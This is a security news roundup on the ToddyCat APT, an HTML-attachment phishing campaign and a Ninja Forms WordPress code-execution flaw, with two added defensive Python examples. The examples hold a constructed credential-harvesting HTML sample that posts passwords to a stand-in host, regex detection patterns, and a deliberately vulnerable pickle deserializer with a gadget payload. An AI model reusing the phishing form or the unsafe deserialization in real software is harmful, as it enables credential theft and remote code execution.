Researchers have observed a campaign attributed to a new APT group, “ToddyCat”, targeting high-profile entities in Europe and Asia.
Researchers have disclosed a campaign, running since December 2020, that targets organizations in Asia and Europe. The threat actor behind it is new to the scene and has been named “ToddyCat” by the researchers. Its primary targets are high-profile organizations: government bodies, military entities and military contractors.
Researchers believe the group has been exploiting a Microsoft Exchange vulnerability since the start of the campaign in December 2020, but they do not have sufficient evidence to confirm this. What is confirmed is that every machine compromised between December 2020 and February 2021 was a Microsoft Exchange server.
Researchers divide the activity into three phases. The first, from December 2020 to February 2021, targeted a limited set of servers belonging to government organizations in Vietnam and Taiwan. In the second, between February 2021 and May 2021, the group expanded its targeting to India, Russia, Iran and the United Kingdom. In the third, observed from February 2022, the threat actor added organizations in Uzbekistan, Kyrgyzstan and Indonesia to its target list. The third phase also differs in that the group began targeting desktop systems as well as servers.
The threat actors also used a previously unknown backdoor named “Samurai” and a new trojan named “Ninja”. In a few specific cases the researchers observed the Samurai backdoor being used to deploy Ninja. Both implants can take control of a compromised system and are used for lateral movement within the victim network.
ToddyCat is a sophisticated group that uses a variety of techniques to stay under the radar. The researchers note that it targets the same industries and countries usually targeted by Chinese groups, but so far they have been unable to attribute the attacks to any known threat actor.
The targets are high-profile government and military organizations, which suggests the motivation is to advance geopolitical interests.
The targeted countries include Taiwan, Vietnam, Afghanistan, India, Pakistan, Iran, Malaysia, Russia, Slovakia, Thailand, the United Kingdom, Kyrgyzstan, Uzbekistan and Indonesia.
Researchers recently observed a spear-phishing campaign, identified by the unique string “DH4 VIP3R L337”, that steals credentials from victims at financial services and security firms. At the time of publication the campaign had used 147 lures to compromise 164 users.
The attack uses a customized HTML attachment as the payload. When the file is opened it redirects the victim to a phishing page impersonating a service the victim normally uses. The page prompts for credentials, which are then checked server-side by a script that uses the PHPMailer library. If the check succeeds, the credentials are sent to an attacker-controlled email address and the victim is redirected to a PDF document hosted on Microsoft OneDrive. If the check fails, the victim is shown an error message and redirected to the legitimate equivalent of the phishing site, so nothing looks amiss. Researchers suspect the HTML attachments are generated automatically by a payload generator kit named “VIP3R_L33T Generator.”
The choice of HTML attachments is key: such files are often exempt from the default attachment restrictions in Secure Email Gateways (SEGs), because large financial firms routinely exchange encrypted messages as HTML attachments.
The campaign therefore gives the attacker an easy way both to validate the stolen credentials as they arrive and to bypass SEG protection.
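As an added example (not from the original article or from the researchers' report), the following Python script scores an HTML attachment for the traits described above: a redirect on open, a credential form posting to a host outside an assumed allowlist of legitimate encrypted-mail portals, and decoding or obfuscation in inline JavaScript. The two samples are constructed for this example; the allowlist host and the phishing domain are hypothetical.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist: hosts of the encrypted-mail portals a SEG would
# legitimately see HTML envelopes posting to. Not a real vendor list.
ALLOWED_FORM_HOSTS = {"securemail.example-bank.com"}
CREDENTIAL_FIELDS = {"password", "passwd", "pwd", "pass", "otp", "pin"}

# Client-side redirect and decoding idioms typical of HTML phishing attachments.
JS_REDIRECT = re.compile(
    r"\b(?:window\.|document\.|top\.)?location(?:\.href|\.replace|\.assign)?\s*[=(]", re.I)
JS_DECODE = re.compile(r"\b(?:atob|unescape|decodeURIComponent|String\.fromCharCode)\s*\(")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")


class _Collector(HTMLParser):
    """Collects form actions, inputs, meta refreshes and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.form_actions, self.inputs, self.scripts, self.meta_refresh = [], [], [], []
        self._script_buf = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "input":
            self.inputs.append((a.get("name", "").lower(), a.get("type", "text").lower()))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s]+)", a.get("content", ""), re.I)
            if m:
                self.meta_refresh.append(m.group(1))
        elif tag == "script":
            self._script_buf = []

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            self.scripts.append("".join(self._script_buf))
            self._script_buf = None


def analyze_html_attachment(html):
    """Return the indicators found in one HTML attachment and a verdict."""
    p = _Collector()
    p.feed(html)
    p.close()
    findings, unlisted_hosts = [], []
    for action in p.form_actions:
        host = urlparse(action).hostname
        if host and host not in ALLOWED_FORM_HOSTS:
            unlisted_hosts.append(host)
    if unlisted_hosts:
        findings.append("form_posts_to_unlisted_host")
    if any(t == "password" or n in CREDENTIAL_FIELDS for n, t in p.inputs):
        findings.append("credential_field")
    if p.meta_refresh:
        findings.append("meta_refresh_redirect")
    scripts = "\n".join(p.scripts)
    if JS_REDIRECT.search(scripts):
        findings.append("js_redirect")
    if JS_DECODE.search(scripts) or B64_BLOB.search(html):
        findings.append("obfuscated_payload")
    # One indicator is worth a look; a redirect on open plus a credential form
    # posting off-site is the pattern described above and should be blocked.
    verdict = "allow" if not findings else ("review" if len(findings) == 1 else "block")
    return {"findings": findings, "unlisted_hosts": unlisted_hosts,
            "redirects": p.meta_refresh, "verdict": verdict}


# Constructed samples for this example, not real campaign artifacts.
PHISHING_SAMPLE = """<html><head>
<meta http-equiv="refresh" content="0; url=https://login-verify.example.net/index.php">
</head><body>
<form method="POST" action="https://login-verify.example.net/mailer.php">
  <input type="email" name="email"><input type="password" name="password">
</form>
<script>setTimeout(function () {
  window.location.href = atob("aHR0cHM6Ly9sb2dpbi12ZXJpZnkuZXhhbXBsZS5uZXQv");
}, 500);</script>
</body></html>"""

ENCRYPTED_MAIL_SAMPLE = """<html><body>
<p>You have received a secure message. Click Open to read it in the portal.</p>
<form method="POST" action="https://securemail.example-bank.com/open">
  <input type="hidden" name="envelope" value="ENVELOPE-ID-1234"><input type="submit" value="Open">
</form></body></html>"""

if __name__ == "__main__":
    for name, sample in (("phishing", PHISHING_SAMPLE), ("encrypted mail", ENCRYPTED_MAIL_SAMPLE)):
        print(name, analyze_html_attachment(sample))
```

Rather than exempting HTML attachments wholesale, a SEG (or a mail-flow rule feeding a sandbox) can apply this kind of content check and reserve the exemption for envelopes that post only to the organisation's known encrypted-mail portals. The regexes are deliberately simple; real kits split strings and stack several layers of atob/unescape, so any decoder call inside an attachment is worth a detonation rather than a regex verdict.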
Ninja Forms, a popular form-builder WordPress plugin installed on more than one million sites, has been found to contain a critical vulnerability, fixed in version 3.6.11 (with the fix back-ported to older 3.x branches), that lets an unauthenticated user execute arbitrary code or delete arbitrary files on an affected site.
Ninja Forms adds easily customizable forms to WordPress sites. One of its features, “Merge Tags”, auto-populates form values from other parts of WordPress, such as post IDs and the logged-in user's name. Researchers found that a flaw in the Merge Tags feature allowed unauthenticated remote attackers to invoke methods of various Ninja Forms classes.
Several exploitation chains are possible against unpatched sites; one of them reaches code that unserializes attacker-supplied data, giving remote code execution via PHP object injection and therefore complete control of the targeted website.
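To show the deserialization step in isolation, here is an added example (not Ninja Forms' code; the function and class names are invented for illustration) that uses Python's pickle as a stand-in for PHP's unserialize(): a merge-tag resolver that deserializes a request-supplied context, an attacker payload whose load-time hook runs a function, and a hardened resolver that refuses any class or function reference while still loading plain data.

```python
import io
import pickle
import re

TAG = re.compile(r"\{(\w+)\}")

# Side-effect log so a test can prove the gadget really executed.
EXECUTED = []


def record_execution(marker):
    """Stand-in for a real gadget's effect (system(), unlink(), file write)."""
    EXECUTED.append(marker)
    return marker


class Gadget:
    """Attacker-controlled class: its reduce hook runs on deserialization,
    the pickle analogue of a PHP class with a dangerous __wakeup/__destruct."""

    def __reduce__(self):
        return (record_execution, ("gadget ran",))


def build_attacker_payload():
    """What an unauthenticated request would carry in the context parameter."""
    return pickle.dumps(Gadget())


def build_legitimate_context():
    """What the feature actually needs: plain key/value data (hypothetical)."""
    return pickle.dumps({"post_id": 42, "user_name": "editor"})


def _substitute(template, context):
    if not isinstance(context, dict):
        context = {}
    return TAG.sub(lambda m: str(context.get(m.group(1), m.group(0))), template)


def resolve_merge_tags_vulnerable(template, context_blob):
    # BUG: request-controlled bytes are deserialized as-is, so any object the
    # attacker serialized is instantiated (and its hooks run) before the
    # isinstance check in _substitute gets a chance to reject it.
    return _substitute(template, pickle.loads(context_blob))


class _DataOnlyUnpickler(pickle.Unpickler):
    """Refuses every class/function reference; only plain data can be loaded.
    Same intent as PHP's unserialize($s, ['allowed_classes' => false])."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"refusing to load {module}.{name}")


def resolve_merge_tags_hardened(template, context_blob):
    context = _DataOnlyUnpickler(io.BytesIO(context_blob)).load()
    return _substitute(template, context)


def demo():
    """Runs both resolvers against both inputs and reports what happened."""
    EXECUTED.clear()
    template = "Post {post_id} by {user_name}"
    result = {}
    resolve_merge_tags_vulnerable(template, build_attacker_payload())
    result["vulnerable_executed_gadget"] = list(EXECUTED)
    EXECUTED.clear()
    try:
        resolve_merge_tags_hardened(template, build_attacker_payload())
        result["hardened_rejected_gadget"] = False
    except pickle.UnpicklingError:
        result["hardened_rejected_gadget"] = not EXECUTED
    result["hardened_legit_output"] = resolve_merge_tags_hardened(template, build_legitimate_context())
    return result


if __name__ == "__main__":
    print(demo())
```

The PHP counterpart of the hardened unpickler is unserialize($data, ['allowed_classes' => false]), or better still, not accepting serialized objects from unauthenticated requests at all and carrying the context as JSON. The isinstance check in the vulnerable version is the kind of validation that looks sufficient but runs only after the object has already been instantiated and its hooks have fired.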